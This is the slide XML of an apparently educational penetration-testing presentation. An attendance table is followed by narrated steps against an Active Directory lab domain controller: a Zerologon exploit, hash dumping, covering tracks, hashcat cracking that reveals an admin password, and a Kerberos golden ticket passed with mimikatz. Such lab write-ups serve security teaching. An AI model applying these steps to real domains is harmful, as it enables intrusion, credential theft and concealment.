                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10000"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="365825">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800"/>
                        <a:t> Wafi</a:t>
                      </a:r>
                      <a:endParaRPr sz="1800"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91450" marR="91450" marT="45725" marB="45725"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800"/>
                        <a:t>Present</a:t>
                      </a:r>
                      <a:endParaRPr/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91450" marR="91450" marT="45725" marB="45725"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800"/>
                        <a:t>Present</a:t>
                      </a:r>
                      <a:endParaRPr sz="1800"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91450" marR="91450" marT="45725" marB="45725"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800"/>
                        <a:t>Mid Term</a:t>
                      </a:r>
                      <a:endParaRPr sz="1800"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91450" marR="91450" marT="45725" marB="45725"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800"/>
                        <a:t>Present</a:t>
                      </a:r>
                      <a:endParaRPr sz="1800"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91450" marR="91450" marT="45725" marB="45725"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800"/>
                        <a:t>Present</a:t>
                      </a:r>
                      <a:endParaRPr sz="1800"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91450" marR="91450" marT="45725" marB="45725"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800"/>
                        <a:t>Present</a:t>
                      </a:r>
                      <a:endParaRPr sz="1800"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91450" marR="91450" marT="45725" marB="45725"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800"/>
                        <a:t>Present</a:t>
                      </a:r>
                      <a:endParaRPr sz="1800"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91450" marR="91450" marT="45725" marB="45725"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10001"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370900">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800"/>
                        <a:t>Tun Siang </a:t>
                      </a:r>
                      <a:endParaRPr sz="1800"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91450" marR="91450" marT="45725" marB="45725"/>
                </a:tc>
                <a:tc>
                  <a:txBody>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Present</a:t>
                      </a:r>
                      <a:endParaRPr sz="1800"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91450" marR="91450" marT="45725" marB="45725"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800"/>
                        <a:t>Present </a:t>
                      </a:r>
                      <a:endParaRPr/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91450" marR="91450" marT="45725" marB="45725"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1700"/>
                        <a:t>Evaluation</a:t>
                      </a:r>
                      <a:endParaRPr sz="1700"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91450" marR="91450" marT="45725" marB="45725"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800"/>
                        <a:t>Present</a:t>
                      </a:r>
                      <a:endParaRPr sz="1800"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91450" marR="91450" marT="45725" marB="45725"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800"/>
                        <a:t>Present</a:t>
                      </a:r>
                      <a:endParaRPr sz="1800"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91450" marR="91450" marT="45725" marB="45725"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800"/>
                        <a:t>Present</a:t>
                      </a:r>
                      <a:endParaRPr sz="1800"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91450" marR="91450" marT="45725" marB="45725"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800"/>
                        <a:t>Present</a:t>
                      </a:r>
                      <a:endParaRPr sz="1800"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91450" marR="91450" marT="45725" marB="45725"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10002"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370900">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800"/>
                        <a:t>Justin</a:t>
                      </a:r>
                      <a:endParaRPr sz="1800"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91450" marR="91450" marT="45725" marB="45725"/>
                </a:tc>
                <a:tc>
                  <a:txBody>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Present</a:t>
                      </a:r>
                      <a:endParaRPr sz="1800"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91450" marR="91450" marT="45725" marB="45725"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800"/>
                        <a:t>Present </a:t>
                      </a:r>
                      <a:endParaRPr sz="1800"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91450" marR="91450" marT="45725" marB="45725"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800"/>
                        <a:t>       -</a:t>
                      </a:r>
                      <a:endParaRPr sz="1800"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91450" marR="91450" marT="45725" marB="45725"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800"/>
                        <a:t>Present</a:t>
                      </a:r>
                      <a:endParaRPr sz="1800"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91450" marR="91450" marT="45725" marB="45725"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800"/>
                        <a:t>Present</a:t>
                      </a:r>
                      <a:endParaRPr sz="1800"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91450" marR="91450" marT="45725" marB="45725"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800"/>
                        <a:t>Present</a:t>
                      </a:r>
                      <a:endParaRPr sz="1800"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91450" marR="91450" marT="45725" marB="45725"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800"/>
                        <a:t>Present</a:t>
                      </a:r>
                      <a:endParaRPr sz="1800"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91450" marR="91450" marT="45725" marB="45725"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10003"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370900">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800"/>
                        <a:t>Irfan</a:t>
                      </a:r>
                      <a:endParaRPr sz="1800"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91450" marR="91450" marT="45725" marB="45725"/>
                </a:tc>
                <a:tc>
                  <a:txBody>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Present</a:t>
                      </a:r>
                      <a:endParaRPr sz="1800"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91450" marR="91450" marT="45725" marB="45725"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800"/>
                        <a:t>Present </a:t>
                      </a:r>
                      <a:endParaRPr sz="1800"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91450" marR="91450" marT="45725" marB="45725"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US"/>
                        <a:t>         -</a:t>
                      </a:r>
                      <a:endParaRPr/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91450" marR="91450" marT="45725" marB="45725"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800"/>
                        <a:t>Present</a:t>
                      </a:r>
                      <a:endParaRPr sz="1800"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91450" marR="91450" marT="45725" marB="45725"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800"/>
                        <a:t>LOA</a:t>
                      </a:r>
                      <a:endParaRPr sz="1800"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91450" marR="91450" marT="45725" marB="45725"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800"/>
                        <a:t>Present</a:t>
                      </a:r>
                      <a:endParaRPr sz="1800"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91450" marR="91450" marT="45725" marB="45725"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800"/>
                        <a:t>Present</a:t>
                      </a:r>
                      <a:endParaRPr sz="180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gb9e1a338e6_0_16"/>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AD Exploit Zerologon</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1100" name="Google Shape;1100;gb9e1a338e6_0_16"/>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Next, we restore the password  of the DC after stealing the hashes to cover our tracks and also restore the functionality of the DC, as before the password on the machine and in the registry was not matching and would have made the DC function improperly</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1101" name="Google Shape;1101;gb9e1a338e6_0_16"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-15700" y="3792754"/>
            <a:ext cx="9144000" cy="280894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gb9e1a338e6_0_23"/>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Cracking the hashes</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1108" name="Google Shape;1108;gb9e1a338e6_0_23"/>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Use hashcat to crack the hashes, specified attack type (-a) 0 for dictionary attack and attack method (-m) 1000 for NTLM hashes</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1109" name="Google Shape;1109;gb9e1a338e6_0_23"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="3141486"/>
            <a:ext cx="9144001" cy="298772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gb9e1a338e6_0_30"/>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Cracking the hashes</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1116" name="Google Shape;1116;gb9e1a338e6_0_30"/>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We were able to crack the hash of the local administrator account on the domain controller, the password being Admin1230</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1117" name="Google Shape;1117;gb9e1a338e6_0_30"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1722300" y="2973888"/>
            <a:ext cx="5923950" cy="1113525"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1118" name="Google Shape;1118;gb9e1a338e6_0_30"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="817613" y="4389425"/>
            <a:ext cx="7172325" cy="6381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gb9f1380cfe_2_0"/>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Kerberos Golden Ticket</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1125" name="Google Shape;1125;gb9f1380cfe_2_0"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="665600" y="4850650"/>
            <a:ext cx="7477200" cy="18600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So we know that we cannot access the domain controller using dir \\C4GDC1\c$ from the domain user</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1126" name="Google Shape;1126;gb9f1380cfe_2_0"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect r="35732"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1155900" y="1370625"/>
            <a:ext cx="4036524" cy="34800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gb9f1380cfe_2_7"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="665600" y="597247"/>
            <a:ext cx="7781400" cy="900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Dump the kerberos NTLM hash and getting its SID</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1133" name="Google Shape;1133;gb9f1380cfe_2_7"/>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Below it shows that the kerberos hashdump and from there we reuse the ticket to play the session.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1134" name="Google Shape;1134;gb9f1380cfe_2_7"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="983462" y="2682575"/>
            <a:ext cx="6840624" cy="39208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gba014e31c3_1_7"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="350900" y="371550"/>
            <a:ext cx="7884900" cy="1126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After dumping we use the SID and NTLM to access the kerberos share folder</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1141" name="Google Shape;1141;gba014e31c3_1_7"/>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After getting the Hash and the SID we just replay it and save it as ticket.kirbi</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1142" name="Google Shape;1142;gba014e31c3_1_7"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="103200" y="3429009"/>
            <a:ext cx="9144001" cy="2278283"/>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gba014e31c3_1_14"/>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Pass the ticket</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1149" name="Google Shape;1149;gba014e31c3_1_14"/>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We use kerberos::ptt ticket.kirbi → to pass the ticket</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="480"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>then we open CMD</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1150" name="Google Shape;1150;gba014e31c3_1_14"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="22400" y="2929050"/>
            <a:ext cx="9067800" cy="21145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gba014e31c3_1_21"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="665600" y="516025"/>
            <a:ext cx="7239900" cy="981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Entering the shared folder in the C4G server</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1157" name="Google Shape;1157;gba014e31c3_1_21"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
